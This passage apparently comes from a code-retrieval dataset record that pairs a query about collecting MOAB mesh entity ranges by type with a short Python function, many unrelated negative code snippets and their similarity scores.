sanitize_path(path)", "def make_sure_path_exists(path):\n try:\n os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST:\n raise", "def mkdir_p(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def ensure_dir(path, raise_=False): # pragma: no cover\n if not os.path.isdir(path):\n if os.path.exists(path):\n LOGGER.error(\"Output dir %s exists and is not a folder!\")\n if raise_:\n raise RuntimeError(\"Output dir %s exists and is not a folder!\")\n return False\n os.makedirs(path)\n return True", "def make_sure_path_exists(path):\n try: os.makedirs(path)\n except OSError as exception:\n if exception.errno != errno.EEXIST: raise", "def _mkdir_if_not_exist(path):\n if not os.path.exists(path):\n try:\n os.makedirs(path)\n except OSError as e:\n if e.errno == errno.EEXIST and os.path.isdir(path):\n logger.warning(\n 'be happy if some process has already created {}'.format(\n path))\n else:\n raise OSError('Failed to mkdir {}'.format(path))", "def dirChecking(dir):\n if not os.path.exists(dir):\n os.mkdir(dir)", "def ensuredirs(dpath, *dpaths):\n try:\n makedirs(path.join(dpath, *dpaths))\n except OSError as e:\n if e.errno != EEXIST:\n raise # Re-raise the exception.", "def maybe_makedirs(path_to_create):\n try:\n os.makedirs(path_to_create)\n except OSError:\n if not os.path.isdir(path_to_create):\n raise", "def create_dir(path):\n if not os.path.exists(path):\n os.makedirs(path)", "def _create_paths(paths):\n for path in paths:\n _mkdir_if_not_exist(path)", "def mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError:\n if not os.path.isdir(path):\n raise\n # in python 3 we could just do\n # os.makedirs(path, exist_ok=True)", "def try_makedirs(path):\n\n try:\n makedirs(path)\n except OSError:\n pass", "def prepare_folder(path):\n if not os.path.isdir(path):\n os.makedirs(path)", "def exist_ok_mkdir (path, mode=0777):\n try:\n os.mkdir (path, mode)\n except OSError:\n if not os.path.isdir (path):\n raise", "def create_directory_if_not_exists(directory_path):\n os.makedirs(directory_path, exist_ok=True)", "def create_dir():\n if check_dir_exist():\n 
return False\n else:\n os.makedirs(path_structure)\n return True", "def _validate_path(dir_path: str) -> None:\n if os.path.exists(dir_path):\n return\n\n logger.info('Creating directory: %s', dir_path)\n os.mkdir(dir_path)", "def makedir(path: str) -> None:\n if not os.path.exists(path):\n # noinspection PyBroadException\n try:\n os.makedirs(path)\n except OSError:\n pass" ]
[ "0.7897075", "0.78796077", "0.7873436", "0.7844147", "0.7843228", "0.78394854", "0.7821767", "0.7799039", "0.77543813", "0.77469003", "0.77352756", "0.7700688", "0.7690964", "0.7684836", "0.7626432", "0.75970924", "0.7586215", "0.75739735", "0.75739735", "0.75736177", "0.75710833", "0.756884", "0.7566628", "0.7566057", "0.7565454", "0.7558784", "0.7557435", "0.75571436", "0.7553918", "0.75490224", "0.7539255", "0.752192", "0.7510897", "0.75040776", "0.75026417", "0.74931616", "0.74931616", "0.74925935", "0.74890953", "0.74811673", "0.7466876", "0.74579984", "0.74448496", "0.7443894", "0.7428906", "0.74156386", "0.7413384", "0.7407306", "0.73997676", "0.73694044", "0.7358448", "0.73533666", "0.7346625", "0.73418385", "0.7341371", "0.7327121", "0.7326125", "0.73143333", "0.7313818", "0.73127985", "0.73102796", "0.7309287", "0.7301042", "0.7291357", "0.7282994", "0.72817487", "0.7275389", "0.72743386", "0.7273983", "0.72736806", "0.72609764", "0.72543514", "0.72524047", "0.7250307", "0.7240143", "0.72393805", "0.7227063", "0.7213775", "0.7209802", "0.71967953", "0.7186346", "0.71802145", "0.7179959", "0.7174866", "0.7172299", "0.71705294", "0.7164276", "0.7163732", "0.7161276", "0.7155368", "0.7151645", "0.71440053", "0.71419066", "0.7141208", "0.71360505", "0.7135794", "0.71339047", "0.71248835", "0.7121395", "0.7115021" ]
0.78439754
4
Get a dictionary with the important tags for DAGMC geometries inputs
def get_dagmc_tags(my_core): dagmc_tags = {} dagmc_tags['geom_dim'] = my_core.tag_get_handle('GEOM_DIMENSION', size=1, tag_type=types.MB_TYPE_INTEGER, storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # geometric dimension dagmc_tags['category'] = my_core.tag_get_handle('CATEGORY', size=32, tag_type=types.MB_TYPE_OPAQUE, storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # the category dagmc_tags['global_id'] = my_core.tag_get_handle('GLOBAL_ID', size=1, tag_type=types.MB_TYPE_INTEGER, storage_type=types.MB_TAG_SPARSE, create_if_missing=True) # id return dagmc_tags
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTag(self, inputs, tag):\n result = {}\n for into in inputs:\n for i in into:\n if i in self.sim.agents:\n agentTags = self.sim.agents[i].access[\"tags\"]\n if tag in agentTags:\n result[i] = agentTags[tag]\n return result", "def tags_dict(self):\n return ({'name': 'tag', 'attrs': {'k': k, 'v': v}} for k, v in self.tags.items())", "def getFeatureDicts(self):\n return [self.data.getWordTagDict(), self.data.tags_trigrams, self.data.tags_bigrams]", "def tags():", "def comando_gne(self):\r\n if args.tag:\r\n\t if args.value:\r\n tags = self.alterar_gne_framework(args.tag, args.value)\r\n\t else:\r\n tags = self.ler_gne_framework(args.tag)\r\n\t return {args.tag:tags[args.tag]} # Ex: {\"nnf\":115}\r", "def tag_dict(self):\n tag_dict = dict()\n for document in self.documents:\n for tag in document.tags:\n tag_type = tag['tag']\n tag_dict[tag_type] = tag_dict.get(tag_type, []) + [tag]\n return tag_dict", "def get_tag_dict(self):\n return self.tag_dict", "def get_tags(self) -> Union[Dict[str, str], None]:\n # read the original value passed by the command\n tags = self.raw_param.get(\"tags\")\n # In create mode, try to read the property value corresponding to the parameter from the `mc` object.\n if self.decorator_mode == DecoratorMode.CREATE:\n if self.mc and self.mc.tags is not None:\n tags = self.mc.tags\n\n # this parameter does not need dynamic completion\n # this parameter does not need validation\n return tags", "def get_tags_gff(tagline):\n\n tags = dict()\n for t in tagline.split(';'):\n tt = t.split('=')\n tags[tt[0]] = tt[1]\n return tags", "def feature_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]:\n return pulumi.get(self, \"feature_tags\")", "def feature_tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ApplicationFeatureTagArgs']]]]:\n return pulumi.get(self, \"feature_tags\")", "def get_tags(self) -> Dict:\n return self.orthanc.get_instance_tags(self.identifier)", "def get_attached_tags(self, complexe_tags):\n attached_tags = []\n for tags in tqdm(complexe_tags):\n tokenized_tags = self.tokenize(tags)\n intersection_tags = self.list_intersection(tokenized_tags)\n attached_tags.append(intersection_tags)\n return attached_tags", "def tag(self):\n \n tag = super(self.__class__, self).tag();\n tag = als.tag_join(tag, als.stra(self.strain));\n tag = als.tag_join(tag, als.stra(self.dtype));\n tag = als.tag_join(tag, 'w=%s' % als.stra(self.wid)); \n tag = als.tag_join(tag, 's=%s' % als.stra(self.stage));\n #tag = analysis.tag_join(tag, 'l=%s' % analysis.stra(self.label)); \n\n return tag;", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:\n return pulumi.get(self, \"tags\")", "def getFeatureDicts(self):\n pass", "def tag_with_features(self, efeats):\n if len(efeats)==3:\n print \"d\"\n\n # build array of dicts\n state_dicts = 
[]\n for e_phi in efeats: \n state_dicts = self.viterbi1(e_phi, state_dicts)\n \n \n # trace back\n yyhat, phis = self.traceback(efeats, state_dicts)\n assert len(efeats)==len(yyhat)#len(yyhat), \n\n return (yyhat, phis)", "def simplified_tags(self) -> Dict:\n return dict(self.client.get_instances_id_tags(self.id_, params={'simplify': True}))", "def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['OceanVirtualNodeGroupLaunchSpecificationTagArgs']]]]:\n return pulumi.get(self, \"tags\")", "def feature_dist_func_dict():\n return {\"tanimoto_dissimilarity\": tanimoto_dissimilarity}", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, 
\"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:\n return pulumi.get(self, \"tags\")", "def _get_input_dict(input_ids: List[Tensor], attention_mask: List[Tensor]) ->Dict[str, Tensor]:\n output_dict = {'input_ids': torch.cat(input_ids), 'attention_mask': torch.cat(attention_mask)}\n return output_dict", "def metadataGeoTags(tif: TiffFile):\n geoTag: TiffTag = tif.pages[0].tags.get('GeoKeyDirectoryTag')\n if geoTag is not None:\n g: TiffTag = tif.pages[0].tags.get(34737)\n g2: TiffTag = tif.pages[0].tags.get(34736)\n g3: TiffTag = 
tif.pages[0].tags.get(33922)\n g4: TiffTag = tif.pages[0].tags.get(33550)\n\n tags = [(geoTag.code, 'H', geoTag.count, geoTag.value),\n (g.code, 's', g.count, g.value),\n (g2.code, 'd', g2.count, g2.value),\n (g3.code, 'd', g3.count, g3.value),\n (g4.code, 'd', g4.count, g4.value)]\n return tags\n else:\n print('no geo tags in file')", "def _tags(self):\n retval = []\n for of in self.tagnames:\n retval.append([of, self.get_datatype(of), self.get(of)])\n return retval", "def get_simplified_tags(self) -> Dict:\n return self.orthanc.get_instance_simplified_tags(self.identifier)", "def inputs_for_model(self, features: Union[SquadExample, List[SquadExample]]) -> Dict:\n args = ['input_ids', 'attention_mask']\n model_type = type(self.model).__name__.lower()\n\n if 'distilbert' not in model_type and 'xlm' not in model_type:\n args += ['token_type_ids']\n\n if 'xlnet' in model_type or 'xlm' in model_type:\n args += ['cls_index', 'p_mask']\n\n if isinstance(features, SquadExample):\n return {k: features.__dict__[k] for k in args}\n else:\n return {k: [feature.__dict__[k] for feature in features] for k in args}", "def tags(self) -> dict:\n\n return self._tags or None # store trivial tags as empty (for iteration), return as None", "def get_parameters(self) -> Dict[str, ParameterInfo]:\n parameter_info_list = {}\n\n for associated_op in self.associated_ops:\n word_tensor = self._get_word_tensor(associated_op)\n position_tensor = self._get_position_tensor(associated_op)\n token_tensor = self._get_token_tensor(associated_op)\n\n for param_tensor in [word_tensor, position_tensor, token_tensor]:\n op_with_param = None\n for consumer in param_tensor.consumers():\n if not consumer.name.startswith('gradients/'):\n assert op_with_param is None\n op_with_param = consumer\n assert op_with_param is not None\n parameter_info_list[param_tensor.op.name] = ParameterInfo('weight', [op_with_param.name])\n\n return parameter_info_list", "def tag(text, pos_tagger):\n features = [get_crf_features([word for word in sent]) for sent in text]\n tags = pos_tagger.predict(features)\n tagged_text = []\n for i in range(len(text)):\n tagged_sent = []\n for j in range(len(text[i])):\n tagged_sent.append((text[i][j], tags[i][j]))\n tagged_text.append(tagged_sent)\n #print(tags)\n return tags, tagged_text", "def tags(self) -> Mapping[str, Any]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Mapping[str, Any]:\n return pulumi.get(self, \"tags\")", "def tag():\n iso_list = []\n tags = [\"spatial_entity\", \"place\", \"motion\", \"location\", \"signal\", \"qslink\", \"olink\"]\n for token in doc:\n if token.norm_ in tags:\n iso_list.append(token.norm_)\n setList = list(set(iso_list))\n my_dict = {i: iso_list.count(i) for i in setList}\n\n for i in tags:\n if i.lower() not in my_dict:\n my_dict[i] = 0\n print(my_dict)", "def kgml_parser(self, kegg_cpd_id_list):\n result_dic = dict()\n # try:\n kg_tree = et.fromstring(self.kgml)\n for cpd in kegg_cpd_id_list:\n for el in kg_tree.iterfind('entry/graphics[@name=\"%s\"]' % cpd):\n if cpd not in result_dic.keys():\n result_dic[cpd] = [(el.get('x'), el.get('y'))]\n else:\n result_dic[cpd].append((el.get('x'), el.get('y')))\n # except:\n # # todo error exception\n # print 'error while parsing kgml of %s' % self.kegg_id\n return result_dic", "def network_nodes_species(self):\n G, mapping = self.network()\n waste, resources, intmed_products = self.amenities()\n\n node_dict = {}\n\n for nd in G:\n # print(nd)\n if isinstance(nd, int):\n node_dict[nd] = \"r\"\n elif nd in 
self.commodity:\n node_dict[nd] = \"Xc\"\n elif nd in waste:\n node_dict[nd] = \"w\"\n elif nd in resources:\n node_dict[nd] = \"Xr\"\n elif nd in intmed_products:\n node_dict[nd] = \"InPr\"\n\n return node_dict", "def _metric_tags(self):\r\n tags = [\r\n u'{}.{}:{}'.format(self.__class__.__name__, attr, self[attr])\r\n for attr in self.metric_tag_fields\r\n if attr in self.attributes\r\n ]\r\n tags.append(u'model_class:{}'.format(self.__class__.__name__))\r\n return tags", "def get_antags(self):\n antags = []\n for obj in self.antagobjs.group_by(AntagObjective.mindkey):\n antag = {'key': obj.mindkey, 'name': obj.mindname, 'role': obj.special_role}\n antags.append(antag)\n return antags", "def feature_tags(self) -> pulumi.Output[Sequence['outputs.ApplicationFeatureTag']]:\n return pulumi.get(self, \"feature_tags\")", "def CreateGeneModels(genes_cmpt, transcripts_cmpt, exons_cmpt, utr3_cmpt, utr5_cmpt, cds_cmpt):\n gene_counter, gene_models = 1, []\n for gene_entry in genes_cmpt: ## Figure out the genes and transcripts associated feature \n if gene_entry in transcripts_cmpt:\n gene=init_gene() \n gene['id']=gene_counter\n gene['name']=gene_entry[1]\n gene['chr']=genes_cmpt[gene_entry]['chr']\n gene['source']=genes_cmpt[gene_entry]['source']\n gene['start']=genes_cmpt[gene_entry]['start']\n gene['stop']=genes_cmpt[gene_entry]['stop']\n gene['strand']=genes_cmpt[gene_entry]['strand']\n if not gene['strand'] in ['+', '-']:\n gene['strand']='.' # Strand info not known replaced with a dot symbol instead of None, ?, . etc.\n if len(transcripts_cmpt[gene_entry])>1:\n gene['is_alt_spliced'] = 1\n gene['is_alt'] = 1\n\t gtype=[]\n for tids in transcripts_cmpt[gene_entry]: ## transcript section related tags \n gene['transcripts'].append(tids['ID'])\n\t\tgtype.append(tids['type'])\n exon_cod, utr5_cod, utr3_cod, cds_cod = [], [], [], []\n if (gene['chr'], tids['ID']) in exons_cmpt:\n exon_cod = [[feat_exon['start'], feat_exon['stop']] for feat_exon in exons_cmpt[(gene['chr'], tids['ID'])]]\n if (gene['chr'], tids['ID']) in utr5_cmpt:\n utr5_cod = [[feat_utr5['start'], feat_utr5['stop']] for feat_utr5 in utr5_cmpt[(gene['chr'], tids['ID'])]]\n if (gene['chr'], tids['ID']) in utr3_cmpt:\n utr3_cod = [[feat_utr3['start'], feat_utr3['stop']] for feat_utr3 in utr3_cmpt[(gene['chr'], tids['ID'])]]\n if (gene['chr'], tids['ID']) in cds_cmpt:\n cds_cod = [[feat_cds['start'], feat_cds['stop']] for feat_cds in cds_cmpt[(gene['chr'], tids['ID'])]]\n if len(exon_cod) == 0: ## build exon coordinates from UTR3, UTR5 and CDS\n if cds_cod != []:\n exon_cod=createExon(gene['strand'], utr5_cod, cds_cod, utr3_cod) \n\n if gene['strand']=='-': ## general order to coordinates\n if len(exon_cod) >1:\n if exon_cod[0][0] > exon_cod[-1][0]:\n exon_cod.reverse()\n if len(cds_cod) >1:\n if cds_cod[0][0] > cds_cod[-1][0]: \n cds_cod.reverse()\n if len(utr3_cod) >1:\n if utr3_cod[0][0] > utr3_cod[-1][0]: \n utr3_cod.reverse()\n if len(utr5_cod) >1:\n if utr5_cod[0][0] > utr5_cod[-1][0]:\n utr5_cod.reverse()\n\n tis, cdsStop, tss, cleave = [], [], [], [] ## speacial sited in the gene region \n if cds_cod != []:\n if gene['strand'] == '+':\n tis = [cds_cod[0][0]]\n cdsStop = [cds_cod[-1][1]-3]\n elif gene['strand'] == '-':\n tis = [cds_cod[-1][1]]\n cdsStop = [cds_cod[0][0]+3]\n if utr5_cod != []:\n if gene['strand'] == '+':\n tss = [utr5_cod[0][0]]\n elif gene['strand'] == '-':\n tss = [utr5_cod[-1][1]]\n if utr3_cod != []:\n if gene['strand'] == '+':\n cleave = [utr3_cod[-1][1]]\n elif gene['strand'] == '-':\n cleave = 
[utr3_cod[0][0]]\n\n cds_status, exon_status, utr_status = 0, 0, 0 ## status of the complete elements of the gene\n if cds_cod != []: ## adding phase to the CDS region \n cds_cod_phase = addCDSphase(gene['strand'], cds_cod)\n cds_status = 1\n gene['cds_exons'].append(cds_cod_phase)\n\n if exon_cod != []: \n exon_status = 1\n if utr5_cod != [] or utr3_cod != []: \n utr_status = 1\n if cds_status != 0 and exon_status != 0 and utr_status != 0:\n gene['transcript_status'].append(1)\n else:\n gene['transcript_status'].append(0)\n\n if exon_cod: ## final check point for a valid gene model \n gene['exons'].append(exon_cod)\n gene['utr3_exons'].append(utr3_cod)\n gene['utr5_exons'].append(utr5_cod)\n gene['tis'].append(tis)\n gene['cdsStop'].append(cdsStop)\n gene['tss'].append(tss)\n gene['cleave'].append(cleave) \n\t \n\t gtype=list(set(gtype)) ## different types \n gene['gene_info']=dict(ID=gene_entry[1],\n\t\t\t\tSource=genes_cmpt[gene_entry]['source'],\n\t\t\t\tType=gtype)\n gene=FeatureValueFormat(gene) ## get prepare for MAT writing \n gene_counter+=1\n gene_models.append(gene)\n return gene_models", "def get_tags_gtf(tagline):\n\n tags = dict()\n for t in tagline.strip(';').split(';'):\n tt = t.strip(' ').split(' ')\n tags[tt[0]] = tt[1].strip('\"')\n return tags", "def tags(self) -> Mapping[str, str]:\n return pulumi.get(self, \"tags\")", "def tags(self) -> Mapping[str, str]:\n return pulumi.get(self, \"tags\")" ]
[ "0.6049964", "0.5798417", "0.5783547", "0.56233895", "0.56191564", "0.5531968", "0.54956996", "0.5407354", "0.54043907", "0.5376861", "0.5376861", "0.53438914", "0.53383356", "0.5330779", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5323087", "0.5320604", "0.5311345", "0.52669716", "0.5262341", "0.5250732", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.52448016", "0.5239589", "0.52186155", "0.5217063", "0.5209652", "0.5196402", "0.51846635", "0.5179804", "0.51782644", "0.51758707", "0.51758707", "0.51612175", "0.51521665", "0.5151035", "0.51502085", "0.51380515", "0.5129575", "0.51211137", "0.51176107", "0.511367", "0.511367" ]
0.6765775
0
Get a dictionary with MOAB ranges for each of the requested entity types inputs
def get_native_ranges(my_core, meshset, entity_types): native_ranges = {} for entity_type in entity_types: native_ranges[entity_type] = my_core.get_entities_by_type( meshset, entity_type) return native_ranges
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_entityset_ranges(my_core, meshset, geom_dim):\n\n entityset_ranges = {}\n entityset_types = ['Nodes', 'Curves', 'Surfaces', 'Volumes']\n for dimension, set_type in enumerate(entityset_types):\n entityset_ranges[set_type] = my_core.get_entities_by_type_and_tag(meshset, types.MBENTITYSET, geom_dim,\n [dimension])\n return entityset_ranges", "def get_ranges(graph: Graph, property_to_id: Dict[str, int], entity_type_to_id: Dict[str, int]) -> Dict[int, int]:\n # dictionary pointing from object property id to an entity type id\n ranges = {}\n\n # add all range triples for which the subject is an object property and the object is an entity type\n for subject, predicate, object in graph.triples((None, RDFS.range, None)):\n if subject in property_to_id and object in entity_type_to_id:\n ranges[property_to_id[subject]] = entity_type_to_id[object]\n return ranges", "def _parse_requantization_ranges(self):\n res = {}\n\n print_suffix = \"__print__\"\n lines = self._get_valid_log()\n temp_min = {}\n temp_max = {}\n pattern_def = r\"{};{}:\\[\\-?\\d+\\.?\\d*e?-?\\+?\\d*\\]\".format(print_suffix, self.postfix)\n for i in lines:\n if not re.search(pattern_def, i):\n continue\n\n max_line_data = i.split(print_suffix + \";\" + self.postfix)[-1]\n min_value = max_line_data.split('][')[0].split('[')[1]\n max_value = max_line_data.split('][')[1].split(']')[0]\n name = i.split(';')[1].strip()[:-len(print_suffix)]\n if name not in temp_min:\n temp_min[name] = []\n if name not in temp_max:\n temp_max[name] = []\n\n temp_min[name].append(float(min_value))\n temp_max[name].append(float(max_value))\n\n for key in temp_min:\n target_min_index = int(np.ceil(len(temp_min[key]) * (1 - self.threshold)))\n\n if key not in res:\n res[key] = []\n\n if target_min_index > len(temp_min[key]) - 1:\n target_min_index = len(temp_min[key]) - 1\n res[key].append(sorted(temp_min[key])[target_min_index])\n\n for key in temp_max:\n target_max_index = int(np.floor(len(temp_max[key]) * self.threshold)) - 1\n\n if target_max_index > len(temp_max[key]) - 1:\n target_max_index = len(temp_max[key]) - 1\n\n res[key].append(sorted(temp_max[key])[target_max_index])\n\n if self.tensor_data:\n for k, v in self.tensor_data.items():\n if k in res:\n self.logger.debug(\"Update node {} min to {}, max to {}.\".format(k, v[2], v[3]))\n res[k] = [v[2], v[3]]\n return res", "def get_param_ranges(line_model):\n\n line_models = ['voigt', 'rosato', 'stehle', 'stehle_param', ]\n n_upper_range = [(np.nan, np.nan), (3, 7), (3, 30), (3, 9)]\n e_dens_range = [(np.nan, np.nan), (1e19, 1e22), (1e16, 1e25), (0., 1e22)]\n temp_range = [(np.nan, np.nan), (0.32, 32), (0.22, 110), (0., 1000)]\n b_field_range = [(np.nan, np.nan), (0, 5), (0, 5), (0, 5)]\n\n param_ranges = list(zip(line_models, n_upper_range, e_dens_range, temp_range, b_field_range))\n columns = ['line_model_name', 'n_upper_range', 'e_dens_range', 'temp_range', 'b_field_range']\n param_ranges = pd.DataFrame(data=param_ranges, columns=columns)\n\n n_upper_range = param_ranges['n_upper_range'][param_ranges['line_model_name'] == line_model].values[0]\n e_dens_range = param_ranges['e_dens_range'][param_ranges['line_model_name'] == line_model].values[0]\n temp_range = param_ranges['temp_range'][param_ranges['line_model_name'] == line_model].values[0]\n b_field_range = param_ranges['b_field_range'][param_ranges['line_model_name'] == line_model].values[0]\n\n return n_upper_range, e_dens_range, temp_range, b_field_range", "def get_etype_2_minmax_funcEnum(entitytype_arr):\n etype_2_minmax_funcEnum = 
